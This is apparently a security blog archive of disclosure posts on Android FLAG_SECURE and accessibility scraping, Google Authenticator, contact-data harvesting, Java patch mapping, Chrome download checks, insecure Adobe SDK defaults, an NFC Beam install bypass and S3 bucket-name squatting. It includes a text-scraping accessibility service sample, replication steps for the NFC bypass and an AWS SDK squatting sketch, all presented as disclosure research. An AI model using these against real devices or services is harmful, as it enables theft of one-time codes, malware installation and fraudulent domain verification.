FLAG_SECURE and Accessibility Services (a11y)

About four years ago, we first blogged about FLAG_SECURE in Android applications and how it can be used to protect sensitive screens from being captured in screenshots. One of the things that prompted our original post is the fact that FLAG_SECURE was never intended as a screenshot-security mechanism; its screenshot blocking is rather a side effect of its DRM-related purpose.

Since then, we have reported the lack of FLAG_SECURE as an issue to multiple Android app vendors. Our most recent blog post was about the fact that Google’s 2FA application (“Google Authenticator”) lacked FLAG_SECURE. We disclosed that specific issue because of recent reports of malware attacking such applications using Android’s accessibility services (a11y). Yanick Fratantonio (who has far more experience with these services) went through the trouble of putting together a PoC, as well as writing a truly excellent blog post about how FLAG_SECURE does NOT protect against attacks using these services.

After reviewing both our research and disclosures published by others, there seems to have been an assumption going around for a while that FLAG_SECURE should protect against such attacks (a11y), but no actual data to back this up. To be clear: FLAG_SECURE should still protect against malware using the MediaProjection API to record video or take screenshots, but it DOES NOT protect against attacks using Android’s accessibility services (a11y).
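To illustrate why, note that an accessibility service is handed the foreground app’s view hierarchy – including any displayed text, such as OTP codes – rather than rendered pixels, and FLAG_SECURE only suppresses pixel capture. Below is a minimal, hypothetical sketch of such a service (our own illustrative code; a real service must also be declared in the manifest with the BIND_ACCESSIBILITY_SERVICE permission and be explicitly enabled by the user):

import android.accessibilityservice.AccessibilityService;
import android.util.Log;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityNodeInfo;

// Hypothetical sketch: log all text in the active window on every event.
// FLAG_SECURE does not block this, because accessibility services receive
// the view hierarchy (including text), not a screenshot.
public class ScraperService extends AccessibilityService {
    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        AccessibilityNodeInfo root = getRootInActiveWindow();
        if (root != null) {
            dumpText(root);
        }
    }

    private void dumpText(AccessibilityNodeInfo node) {
        if (node.getText() != null) {
            Log.d("ScraperService", node.getText().toString());
        }
        for (int i = 0; i < node.getChildCount(); i++) {
            AccessibilityNodeInfo child = node.getChild(i);
            if (child != null) {
                dumpText(child);
            }
        }
    }

    @Override
    public void onInterrupt() {
        // Required override; nothing to do in this sketch.
    }
}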

We amended our earlier posts to make this distinction clear and would like to thank Yanick Fratantonio for bringing this up.

Google Authenticator for Android Allows Screen Capture

Google offers an application for Android called “Google Authenticator” which is used to set up two-factor authentication (2FA). This application generates the standard one-time password (OTP) codes used for 2FA.
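For background, these codes are typically time-based OTPs (TOTP, RFC 6238): a short numeric code derived from a shared secret and the current 30-second time step. Here is a minimal sketch of the standard algorithm (the HMAC-SHA1 variant; illustrative, not Google’s actual implementation):

import java.nio.ByteBuffer;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

// Sketch of TOTP (RFC 6238): derive a 6-digit code from a shared secret
// and the current 30-second time step, using HMAC-SHA1 with the dynamic
// truncation defined in RFC 4226.
public class TotpSketch {
    public static int generate(byte[] secret, long unixSeconds) throws Exception {
        long counter = unixSeconds / 30;
        byte[] message = ByteBuffer.allocate(8).putLong(counter).array();
        Mac mac = Mac.getInstance("HmacSHA1");
        mac.init(new SecretKeySpec(secret, "HmacSHA1"));
        byte[] hash = mac.doFinal(message);
        int offset = hash[hash.length - 1] & 0x0f;
        int binary = ((hash[offset] & 0x7f) << 24)
                   | ((hash[offset + 1] & 0xff) << 16)
                   | ((hash[offset + 2] & 0xff) << 8)
                   |  (hash[offset + 3] & 0xff);
        return binary % 1000000; // 6-digit code
    }
}

Whoever can read these codes off the screen as they are generated can use them within the validity window.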

It appears that Google Authenticator allows screenshots to be taken of OTP codes. The implication is that if a user’s device ends up running a rogue app, that app can capture all generated OTP codes as they are shown by the app, and thus break two-factor authentication.

[EDITED: 2020-03-23: This is only true for rogue apps with screen capture permissions (MediaProjection); apps using accessibility (a11y) permissions are a separate concern, since many such rogue apps use Android accessibility to scrape content from running apps, and adding FLAG_SECURE does not prevent that (see UPDATE #3 below and our follow-up post).]

UPDATE (2020-03-03): Disclosed publicly because of recent media reports

UPDATE #2 (2020-03-04): Multiple people noted that Microsoft Authenticator has the same issue. We blogged about that back in 2018 and the issue remains unfixed.

UPDATE #3 (2020-03-23): Although FLAG_SECURE may protect against malicious apps using the MediaProjection APIs, as per the comment below from Yanick Fratantonio and his blog post, it does not protect against attacks using accessibility services. See our follow-up post here.

Steps to Replicate

To replicate, try the following:

  1. Open the application.
  2. Add an account.
  3. Press Power + Volume Down at any sensitive screen and observe a screenshot being taken.

The underlying reason is that the app does not set “FLAG_SECURE” on such screens (more information on FLAG_SECURE can be found in our earlier blog post). By contrast, many Android apps with higher security requirements do use it. A sketch of the fix appears below.
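For reference, this is roughly what the mitigation looks like – a minimal sketch, with the activity and layout names being illustrative rather than Google’s actual code:

import android.app.Activity;
import android.os.Bundle;
import android.view.WindowManager;

// Illustrative activity for a sensitive screen (e.g., one displaying OTP codes).
public class OtpActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // FLAG_SECURE blocks screenshots, screen recording and MediaProjection
        // capture of this window - though not accessibility-based scraping.
        getWindow().setFlags(WindowManager.LayoutParams.FLAG_SECURE,
                             WindowManager.LayoutParams.FLAG_SECURE);
        setContentView(R.layout.otp_screen); // illustrative layout resource
    }
}

The flag must be set before the window is displayed, which is why it belongs in onCreate().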

Vendor Response

We filed a bug report with the vendor (Google) and the vendor filed an internal bug. The vendor never informed us whether the bug was fixed. Testing on the most recent version reveals that the bug is still present.

[Screenshot: a screenshot captured from the current version of the app]

References

  • GitHub issue filed by someone else – see here
  • Google Play link to the app – see here
  • Google Security Case # 8-2193000017345
  • Our earlier blog post about FLAG_SECURE on Android – see here
  • ZDNet report regarding Cerberus malware attacking this app – see here

Timeline

  • 2014-10-10: GitHub issue filed by someone else
  • 2017-05-10: Issue filed with the vendor, triaged and bug filed
  • 2017-05-11: Follow-up discussion regarding other vendor apps
  • 2017-05-12: Response regarding bounty received
  • 2020-02-27: Media story regarding malware targeting this app
  • 2020-03-03: Public disclosure
  • 2020-03-04: Added comment regarding Microsoft Authenticator
  • 2020-03-23: Added clarification regarding screenshot permissions and accessibility permissions

 

Another Tale of Personal Data Harvesting: Alsid, Lusha.co and Simpler Apps

After reading a recent post by Antoine Neuenschwander, we wanted to share a similar experience from one of our consultants regarding the sale and use of their personal data, featuring many of the same players as Antoine’s post.

Part 1 – The Sales Call from Alsid

One of the many scourges of modern work is that salespeople try to reach you all the time. In this particular case, our consultant was contacted on their work phone, via email and on LinkedIn by someone from a French cybersecurity company called Alsid. Then, to their surprise, a call from France rang on their personal, US-based cell phone and left a voicemail. That got them curious – how did this company get hold of a personal cell phone number? Since the company is French, it is subject to GDPR, so they asked for a copy of their data held by the company. The company did provide a fairly extensive GDPR response, but the cell phone number wasn’t in it! After follow-up questioning, the company eventually dug it out – their salesperson got it from Lusha.co:

[Screenshot: Alsid’s follow-up response identifying Lusha.co as the source of the number]

There are several privacy concerns here:

  • Why was the number not provided in the initial GDPR request?
  • Did the caller check to make sure the number wasn’t a wireless phone AND wasn’t on the Do Not Call List (since it is illegal to place telemarketing calls to such numbers in the US)?

Part 2 – The B2B Contact Enrichment Tool – Lusha.co

Lusha.co provides a set of plugins that can enrich LinkedIn profiles – if you are looking at someone’s profile, they can supplement it with the person’s phone number or email from other sources. The website, marketing materials and privacy policy are pretty explicit about this:

[Screenshot: Lusha.co marketing materials]

And (emphasis added):

Our Services are designed to help Users and vendors (e.g. HR professionals, B2B partners, sales platforms) validate and verify contact information and to find business profiles they seek in order to interact with relevant Contacts (as defined below), through access to business profiles retained in Lusha’s database (“Lusha Database”). 

A data request sent to Lusha.co resulted in the response below. Note the language around Simpler – specifically the last paragraph. It seems that Simpler provides mobile apps to be used for “verification”, then those apps slurp up the user’s contacts and share them back with Lusha.co:

[Screenshot: Lusha.co’s data request response]

Excerpt of the text appears below:

Simpler also offers its users the opportunity to contribute to a collaborative security effort, meant to assist in authenticating the identifying attributes of an individual. This effort can assist in establishing a trusted channel of communication for online and offline interactions.

If a Simpler user consents to contribute to this effort, basic contact information (name and phone number) found within such user’s contacts may be shared with Lusha, which implements the security solution.

If you dig deeper into the Lusha.co materials, a lot of similar language appears there as well. Instead of a discussion of B2B contact data, it suddenly becomes a matter of “security“, “trust” and a “collaborative security effort“. When you look at their data page (emphasis added), note that the language quickly changes from “lead enrichment” or “B2B data” to a “collaborative security effort”:

Lusha’s core purpose is to make online engagement safe and efficient. In today’s fast-paced and multi-layered world, one of the main challenges to online users is trust. A major risk in online interactions is the risk of encountering fraud, whether by phishing attempts or by identity theft. Widespread fraud can lead to the loss of customer trust, extra costs of time and money required to manage fraud incidents, damages to the reputation of individuals and institutions, possible legal costs and many more negative outcomes.

Lusha’s unique solution is based on a collaborative security effort, effectively utilizing information to verify online identities. The Lusha service provides its users with valuable insights and assists in authenticating the identity of individuals in the online sphere.

There are several privacy concerns here:

  • Why is a tool that claims to provide B2B information obfuscated behind being “a security solution”?
  • How can “security” and “trust” justify essentially taking users’ address books from their mobile devices and selling that data for marketing?

Part 3 – The Mobile Address Books from Simpler

The link provided by Lusha actually leads to the Google Play Store. This leads to two apps – Simpler Caller ID and Dialer, both with more than 5 million installations each. The link on the store listings leads to the company’s website where a third app is listed – EasyBackup, a contacts backup manager (iOS only). That one is owned by a different company called “Top Floor”, which also makes an app called “Cleaner Pro” (for iOS) that claims to remove duplicate contacts. Mailing addresses for both companies go to co-working spaces: one in Brooklyn, NY and the other in Los Angeles, CA.

The Simpler Apps website still lists all of these apps as being theirs:

[Screenshot: the Simpler Apps website listing the apps]

A request was sent to Simpler for a copy of the data they collected, and the following response was received – no data. A follow-up request was sent and a response is still pending:

[Screenshot: Simpler’s response to the data request]

At this point we are at a dead end with Simpler, but further research reveals the following nuggets buried in the terms of use and privacy policy:

By using our Services, you acknowledge and agree that we will share contact information with other users our affiliates and business partners for the purpose of ensuring that their current contact information is up to date. You acknowledge that you have the rights and permissions required to allow us to share such contact information.

And:

We do not share your Personal Information with third parties except:

  • The Services are based on contact management and Caller ID (if applicable), therefore, we will use your number and contact for this purpose. This disclosure is also important to individuals that are not our users which may be identified by the caller ID. We enable an easy opt-out in the event you no longer wish to be identified, for more information see the User Right section below.

  • We may also share Personal Information with (i) our subsidiaries and business partners if needed; (ii) subcontractors and other third party service providers (e.g. payment processors, server, cloud management, etc.); and (iii) any potential purchasers or investors of the Company.

There are several privacy concerns here:

  • Why is a tool that claims to help keep contact information up to date selling data for marketing?
  • What is the connection between Simpler and Lusha.co?

Part 4 – Tying It All Together: Lusha.co and Simpler

At this point, it is fairly clear what happened – a set of mobile apps slurp up contacts from their users’ address books and provide them to Lusha.co to be used by marketers and recruiters. This is presented as a “collaborative security solution” while it is essentially just selling personal data, albeit with an opt-out available. What is frustrating is that regular users who are friends with the people being targeted install these apps thinking they are simple utilities, while all of their contacts are being sold behind their backs. At the same time, Lusha.co claims to be a security solution while it is clearly not.

[Diagram: data flow between the apps, Simpler and Lusha.co]

But there is more… a set of simple Google searches shows that one of the co-founders of Lusha.co (“Yoni Tserruya”) is actually the original developer of all four of these apps (here, here, here and here). Furthermore, if you download the Android apps provided by Simpler and look at the signing keys via jadx, the certificates are issued to the same person, as seen below:

[Screenshots: signing certificates of the two Android apps, issued to the same person]

These apps are now published by companies other than Lusha.co – Simpler Apps and Top Floor – but are they subsidiaries of, or otherwise related to, Lusha.co? If they are, then the privacy policies seem to allow them to transfer data from these apps back to Lusha.co. Overall, the arrangement may be legal, but it is perhaps unethical.

Bottom line: this example highlights yet another way personal data is harvested, sold and re-used for commercial purposes.

Vendor Responses

We reached out for comment to all of the companies mentioned in the article and will update the blog post with feedback or comments.

Mapping the Jan 2020 Java Security Patches Back to the Original Source Code Changes

(UPDATE [01/16/2020]: Added clarification as to the source of the information for the source commits)

Earlier today, Oracle released patches for various flavors of Java. At the same time, the open source version of Java – OpenJDK – released its patches as well. The problem is that it is virtually impossible to figure out what the actual bugs are. Here are partial screenshots from Oracle’s critical patch update advisory, the text version and the OpenJDK advisory:

[Screenshots: excerpts from Oracle’s critical patch update advisory, its text version and the OpenJDK advisory]

The actual CVE descriptions are also cryptic – here is an example of one (CVE-2020-2583):

Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded.

Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs.

CVSS v3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). 

The problem is that not enough information is provided to make an educated decision, especially in cases where there are limited resources for patching. How do we figure out what the vulnerability actually is?

It is possible to derive the source code changes from the Debian package updates and the OpenJDK release notes, which map the CVEs to the actual source code changesets in the OpenJDK repository (HG and GitHub). For example, as seen below, “CVE-2020-2583” links to changeset # 8224909:

[Screenshot: OpenJDK release notes mapping CVE-2020-2583 to changeset # 8224909]

Looking at the HG repository for OpenJDK and the GitHub mirror, it is pretty easy to locate the corresponding commit:

[Screenshot: changeset 8224909 in the OpenJDK HG repository]

[Screenshot: the corresponding commit in the GitHub mirror]

And the actual changes can now be examined in detail:

[Screenshots: the actual source code changes for changeset 8224909]

Based on those sources, we can now reconstruct the actual bugs and their source code changes for JDK 11 (Debian message here, based on the OpenJDK release notes here):

  • CVE-2020-2604 – core-libs/java.io:serialization – CVSSv3 7.1 – commit 8231422 (HG / GitHub) – Better serial filter handling
  • CVE-2020-2601 – security-libs/java.security – CVSSv3 6.8 – commit 8229951 (HG / GitHub) – Better Ticket Granting Services
  • CVE-2020-2655 – security-libs/javax.net.ssl – CVSSv3 4.8 – commit 8231780 (HG / GitHub) – Better TLS messaging support
  • CVE-2020-2593 – core-libs/java.net – CVSSv3 4.8 – commit 8228548 (HG / GitHub) – Normalize normalization for all
  • CVE-2020-2654 – security-libs/java.security – CVSSv3 3.7 – commit 8234037 (HG / GitHub) – Improve Object Identifier Processing
  • CVE-2020-2590 – security-libs/org.ietf.jgss – CVSSv3 3.7 – commit 8226352 (HG / GitHub) – Improve Kerberos interop capabilities
  • CVE-2020-2583 – client-libs/java.beans – CVSSv3 3.7 – commit 8224909 (HG / GitHub) – Unlink Set of LinkedHashSets

Additionally, for CVE-2020-2604, the Oracle release notes include the following (the JDK bug # corresponds to the commit # above):

[Screenshot: Oracle release notes entry for CVE-2020-2604]

Credits

Written by Y. Shafranovich

Behavior Change in Chrome’s Download Protection Service Affecting Privacy

The Download Protection service in Chrome protects users from downloading malware/viruses by blocking files that are known to be unsafe according to Google’s Safe Browsing service. The way this works is that Chrome sends some basic information about the file being downloaded, including its checksum, to the Safe Browsing service and receives a verdict.

Historically, not all file types were checked – instead, lists of extensions to be checked or ignored are defined in the Chrome source code, and only extensions on the check list were examined; anything not listed was ignored. These lists can be found in the file “download_file_types.asciipb”.

Apparently, this has changed recently. As per information provided in a recent bug report (https://crbug.com/1039128), Chrome now checks ALL extensions except for the ones on the whitelist. That means that when you download almost any file, its checksum and some other information about the file are sent to Google. It is not clear how this impacts privacy.

You can disable this behavior by disabling Safe Browsing entirely, but that will also disable checks for malicious URLs. As of now, there doesn’t seem to be an option to disable download protection separately from Safe Browsing for URLs.

You can see this information by visiting the following URL:

Example of an MRC file being downloaded from the Internet Archive:

[Screenshot: Safe Browsing information for an MRC file downloaded from the Internet Archive]

Credits

Written by Y. Shafranovich.

Insecure Defaults in Adobe’s Mobile SDKs

Summary

Example/default configuration files provided by Adobe within their mobile SDKs include several insecure options. These have also been found in the wild in multiple mobile applications. When these options are used insecurely, attackers can view or modify information transmitted by the application back to Adobe’s cloud services.

Application developers are encouraged to check the configuration files within their own applications to make sure these options are set correctly. The vendor has updated some of these files with secure alternatives – for others, new SDKs are available with secure defaults.

We also have a tool available (“truegaze“) that can be used to statically scan mobile applications for insecure defaults in their Adobe configurations.

Details

Adobe provides multiple mobile SDKs intended for integration into mobile applications across multiple platforms. These SDKs communicate between the mobile apps and the vendor-provided cloud services. Some of the example/default configuration files include insecure settings, which can lead to developers copying those settings into their own applications – and we have observed this behavior in the wild. We are also working on automated tools to detect these files with insecure settings within mobile applications.

The main configuration file for these SDKs is called “ADBMobileConfig.json” and is usually packaged within the application file. There are several insecure settings within this file which may lead to sensitive data being transmitted without SSL, where it can be seen or modified by an attacker with access to the network traffic. These include:

  • analytics -> ssl – enables (true) or disables (false) sending measurement data over SSL (HTTPS). Default is false. This is the setting most commonly found and should be changed to “true”.
  • mediaHeartbeat -> ssl – enables (true) or disables (false) sending heartbeat data over SSL (HTTPS). Default is false.

There are also additional settings which can be incorrectly set not to use SSL, but are not usually presented that way by default:

  • postback -> templateurl – configuration for the postback URL, which is used to send data collected by the SDK to a third-party server
  • remotes – defines the Adobe-hosted endpoints for dynamic configuration files including:
    • analytics.poi – endpoint for hosted POI configuration.
    • messages – endpoint for hosted in-app message configuration

This can also be configured via code as follows:

  • C/C++/Objective C – hbConfig.ssl = NO;
  • JS – MediaHeartbeatConfig.ssl = false

Here is an abbreviated example file with the insecure settings highlighted:

{
  "analytics": {
    ...
    "ssl": false,
    ...
  },
  "messages": [
    {
      ...
      "payload": {
        "templateurl": "http://example.com/subscriptions/{%mcid%}",
        ...
      },
      ...
    }
  ],
  "remotes": { 
        "analytics.poi": "http://assets.adobedtm.com/staging/42a6fc9b77cd9f29082cf19b787bae75b7d1f9ca/scripts/satellite-53e0faadc2f9ed92bc00003b.json", 
        "messages": "http://assets.adobedtm.com/staging/42a6fc9b77cd9f29082cf19b787bae75b7d1f9ca/scripts/satellite-53e0f9e2c2f9ed92bc000032.json" 
    }
 }
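As a quick way to spot these settings in a built app, the APK can be opened as a ZIP archive and the config inspected directly. Here is a rough sketch in Java (our own illustrative code; the string matching is naive and the config file’s location within the APK may vary):

import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.Enumeration;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

// Rough sketch: scan an APK (a ZIP file) for ADBMobileConfig.json and
// flag insecure settings via naive string matching.
public class AdobeConfigCheck {
    public static void main(String[] args) throws Exception {
        try (ZipFile apk = new ZipFile(args[0])) {
            Enumeration<? extends ZipEntry> entries = apk.entries();
            while (entries.hasMoreElements()) {
                ZipEntry entry = entries.nextElement();
                if (!entry.getName().endsWith("ADBMobileConfig.json")) continue;
                try (InputStream in = apk.getInputStream(entry)) {
                    String json = new String(in.readAllBytes(), StandardCharsets.UTF_8);
                    if (json.contains("\"ssl\": false") || json.contains("\"ssl\":false")) {
                        System.out.println(entry.getName() + ": SSL is disabled");
                    }
                    if (json.contains("http://")) {
                        System.out.println(entry.getName() + ": plain-HTTP endpoint present");
                    }
                }
            }
        }
    }
}

For anything beyond a spot check, see the truegaze tool mentioned above, which performs this kind of scanning properly.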

Examples

The following examples/docs were reported to the vendor and were updated to have secure defaults:

The following have insecure defaults and are present within vendor-provided code, documentation or code samples. The vendor will not be fixing them:

Vendor Response and Mitigation

Application developers utilizing the Adobe SDK within their applications should check the configuration for the SDK to make sure all of the options are set securely.

The vendor provided the following response:

Thanks for reaching out to Adobe.  The configuration file you identified is an empty “sample” file, and we’re working with the owner to update that config to use SSL by default.  In practice, Adobe customers will either:

1. Download a file from Mobile Services (where SSL is on by default)
2. Engage Adobe professional services to create a configuration file (wherein SSL is recommended) or,  
3. Customers will create their own configuration (where the vast majority enable SSL)

Additionally, we’ve released a new version of the SDK (https://github.com/Adobe-Marketing-Cloud/acp-sdks), configurable in Launch, where SSL is always turned on by default. 

The vendor also fixed most of these issues and provided the following response regarding the remaining unfixed issues:

Adobe has announced end-of-support for these vulnerable SDKs and encourages customers to move to our new version of the SDK where SSL is the default:

https://aep-sdks.gitbook.io/docs/version-4-sdk-end-of-support-faq

Static Scanning Tools

We have developed an open source tool that can be used to statically scan mobile applications for insecure defaults in their Adobe configurations. You can find it here:

https://github.com/nightwatchcybersecurity/truegaze

References

Adobe tracker # PSIRT-9709
Vendor documentation: see here

Credits

Advisory written by Y. Shafranovich.

Timeline

2019-03-04: Initial report to the vendor
2019-05-06: Followup communication with the vendor
2019-07-28: Draft blog post sent to the vendor for review
2019-08-01: Follow-up communication with the vendor
2019-08-09: Follow-up communication with the vendor
2019-10-08: Follow-up communication with the vendor
2019-10-29: Follow-up communication with the vendor
2019-10-30: Ok to publish received from the vendor
2019-11-06: Public disclosure

NFC Beaming Bypasses Security Controls in Android [CVE-2019-2114]

Summary

NFC beaming of applications between devices using Android OS bypasses some security controls (the “install unknown application” prompt). A rogue device like a payment terminal can use this vulnerability to infect devices with malware.

Affected versions of Android are version 8 (Oreo) and higher. The vendor assigned CVE-2019-2114 to track this issue and released a fix in the October 2019 security bulletin. Users are encouraged to update their devices to mitigate this vulnerability.

Background

Android is an open source operating system developed by Google for mobile phones and tablets. It is estimated that over two billion devices worldwide run Android. Most Android devices are restricted in which applications can be installed by users – in particular, they must originate from the Google Play Store. Prior to version 8 (Oreo), a system-wide setting existed in the OS (“Settings” -> “Security”) which allowed users to override this control and install applications from any source. In Android 8 (Oreo) this was changed: users must now grant permission to each application that is trying to perform such an install, as opposed to flipping a system-wide setting, as sketched below.
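For context, here is a minimal sketch (our own illustrative code, not from the advisory) of the flow an ordinary app must follow on Android 8+ before it can install packages:

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.provider.Settings;

// Sketch: on Android 8.0+ (API 26+), an ordinary app must be individually
// granted "Install unknown apps" by the user before it may install packages.
public class InstallPermissionActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        if (!getPackageManager().canRequestPackageInstalls()) {
            // Send the user to this app's "Install unknown apps" settings screen.
            startActivity(new Intent(Settings.ACTION_MANAGE_UNKNOWN_APP_SOURCES,
                    Uri.parse("package:" + getPackageName())));
        }
    }
}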

Some Android devices support NFC (Near Field Communication) – a set of protocols that allow devices to communicate within a very short distance. This is used for applications like contactless payments, pairing of devices and access control. Android devices also support transferring data over NFC between two devices – including contacts, photos and applications – via a feature called Android Beam.
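As a rough illustration of the sending side, this is approximately how an app queues a file for transfer via Android Beam using the platform API (the file name is illustrative; the replication steps below use the stock file manager instead):

import android.app.Activity;
import android.net.Uri;
import android.nfc.NfcAdapter;
import android.os.Bundle;
import java.io.File;

// Sketch: queue a file (e.g., an APK) to be sent via Android Beam when this
// activity is in the foreground and the two devices are tapped together.
public class BeamSenderActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        NfcAdapter nfcAdapter = NfcAdapter.getDefaultAdapter(this);
        if (nfcAdapter != null) {
            File apk = new File(getExternalFilesDir(null), "example.apk"); // illustrative
            nfcAdapter.setBeamPushUris(new Uri[] { Uri.fromFile(apk) }, this);
        }
    }
}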

Vulnerability Details

In Android 8 (Oreo), a new feature was introduced that requires users to opt in to the “Install unknown apps” permission on an app-by-app basis. However, it appears that any system application signed by Google is automatically whitelisted and does not prompt the user for this permission. On a standard Android OS device, the NFC service is one such system application that has the permission to install other applications. This means that on an Android phone with NFC and Android Beam enabled, tapping a malicious phone or a malicious NFC payment terminal against the device may allow malware to be installed, bypassing the “install unknown apps” prompt.

To see these permissions, take any Android phone with NFC running Android 8 or higher, go to “Settings” and search for “Install unknown apps” to find the permission. Tap through to view the apps, and make sure to select “Show system” in the drop-down menu. You will see that the “NFC Service” is listed as allowed to install applications by default (since it is a system application). See example:

[Screenshot: “NFC Service” listed as allowed under “Install unknown apps”]

Steps to Replicate

To actually replicate a malicious drive-by install, do the following:

  1. Set up two phones with NFC and Android Beam enabled.
  2. Download any APK file on the “sender” phone (something like this APK from GitHub).
  3. Go to the file manager on the “sender” phone, tap the file and select “Share”. Then select “Android Beam” as the sharing method.
  4. Bring the two phones together and complete the transfer.
  5. After this is done, go to the receiver phone, tap the “Beam completed” notification, and tap the file. It will skip directly to the install prompt, bypassing the “Install unknown apps” check.

Tested on Android 9 and Android 8.1.0.

Vendor Response and Mitigation

The vendor (Google) classified this issue as High and assigned CVE-2019-2114 to track this issue. A fix was released in the October 2019 security bulletin. Users are encouraged to update their devices to mitigate this vulnerability. After applying the update, users are encouraged to check the “Install unknown apps” permission in settings to make sure the NFC Service is listed as “not allowed” to install applications.

This issue only affects Android version 8 (Oreo) or higher.

References

Android bulletin: October 2019 (2019-10-06)
CVE ID: CVE-2019-2114
Google Bug # 123651515 (Android ID # A-123700348)
Google Blog: Blog post about the changes in the “install unknown apps” permission

Bounty Information

This issue satisfied the requirements of the Android Security Rewards Program and a bounty was paid by the vendor.

Credits

This advisory was written by Y. Shafranovich.

Timeline

2019-01-30: Initial report submitted to the vendor
2019-01-31: Vendor response received – issue under investigation
2019-02-01: Issue rated as High by the vendor
2019-03-02: Checking bug status, vendor communication
2019-04-06: Checking bug status, vendor communication
2019-04-29: Checking bug status, fix is still being worked on
2019-06-29: Checking bug status, vendor communication
2019-07-01: Vendor indicating that a patch is forthcoming, CVE assigned
2019-07-08: Notified vendor about upcoming talk
2019-07-10: Vendor informing that the fix has been delayed by a month
2019-07-28: Draft blog post sent to the vendor for review
2019-07-31: Blog post comments received from the vendor
2019-09-04: Follow-up communication with the vendor
2019-10-07: Fix released
2019-10-24: Public disclosure


Fixes for CVE-2018-9581 and CVE-2018-9489 in Android 10

Two privacy issues with broadcasts in Android OS are expected to be fixed in Android Q / 10, which will be released in early September of 2019. You can see the details in Google’s security bulletin available here. Some of these fixes were not available for earlier versions of Android.

We originally discovered these in the Spring of 2018, and they were disclosed via a talk at BSides DE late last year.

Path-Style Model for AWS S3 Can Lead to Namespace Squatting

Summary

The path-style model for AWS S3 and other services supporting S3 APIs can lead to namespace squatting. An attacker can create a bucket whose name matches a special filename like “robots.txt” or “crossdomain.xml”, and insert their own content via filenames placed in that bucket. Services that rely on file-based verification of domain ownership and are not precise about checking the content of such files may end up verifying ownership of the parent domain incorrectly. We have not yet been able to confirm this via testing.

AWS will be deprecating this functionality as of September 30th, 2020.

Details

Amazon Web Services (AWS) provides a storage service called Simple Storage Service (S3), which allows users to store data as files located inside separate locations called buckets (see docs). S3 currently supports two different addressing models: path-style and virtual-hosted style. The path-style looks like this:

https://s3.amazonaws.com/bucket/file

The virtual-hosted style looks like this:

https://bucket.s3.amazonaws.com/file

It is possible to name a bucket using a reserved name like “robots.txt”, “sitemap.xml” or “crossdomain.xml” and have it available via path-style addressing. HOWEVER, the only thing that gets returned is an XML-type directory listing. An attacker can add files to that bucket to try to influence the directory listing, but most parsers would disregard the entire file since it is malformed. What may end up happening is that the attacker essentially squats the namespace.

It is not possible to reserve anything in the “.well-known” directory, since it starts with a period and bucket names must start with a lowercase letter or a number. Thus it would not be possible to get an SSL certificate issued this way.

Additionally, if a third party service like Google WebMaster tools, Bing, etc. uses a domain validation approach to verify ownership by placing a file in the root directory, it may be possible to claim the “s3.amazonaws.com” domain as follows:

1. Create a bucket matching the verification name of the file.
2. Add the verification content as a key in that bucket.
3. Make the bucket public.

When the verification service hits the URL for “s3.amazonaws.com/verification.html”, it will hit the bucket listing that was created. If the service disregards the XML wrapper and uses the value it finds, it may end up registering the “s3.amazonaws.com” domain in the attacker’s account.
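To make these steps concrete, here is a rough sketch using the AWS SDK for Java v1 (the bucket name and token value are illustrative, and bucket creation will fail if the name is already taken, since bucket names are global):

import com.amazonaws.services.s3.AmazonS3;
import com.amazonaws.services.s3.AmazonS3ClientBuilder;
import com.amazonaws.services.s3.model.CannedAccessControlList;

// Sketch: squat a verification file name in the path-style S3 namespace.
// Afterwards, https://s3.amazonaws.com/verification.html returns this
// bucket's XML directory listing, which contains the key name below.
public class S3SquatSketch {
    public static void main(String[] args) {
        AmazonS3 s3 = AmazonS3ClientBuilder.defaultClient();
        String bucket = "verification.html"; // illustrative: matches the expected file name
        s3.createBucket(bucket);
        // The key name itself carries the verification token, so it shows
        // up in the directory listing returned at the bucket root.
        s3.putObject(bucket, "verification-token-value", "");
        // Make the listing publicly readable.
        s3.setBucketAcl(bucket, CannedAccessControlList.PublicRead);
    }
}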

In our testing, we have not yet found such a service – most services will not parse the XML file that the directory listing produces.

Vendor Response and Mitigation

The vendor provided the following response:

We do not believe the behavior you describe in this report presents a security concern, given what you have outlined is theoretical.

Additionally, AWS has announced that the path-style addressing model will be deprecated as of September 30th, 2020 (see here and here).

Credits

Text written by Y. Shafranovich.

Timeline

2019-02-03: Initial report to the vendor
2019-02-06: Followup communication with the vendor
2019-02-12: Followup communication with the vendor
2019-02-18: Followup communication with the vendor
2019-02-19: Followup communication with the vendor
2019-05-03: Followup communication with the vendor
2019-07-28: Draft blog post sent to the vendor for review
2019-08-14: Public disclosure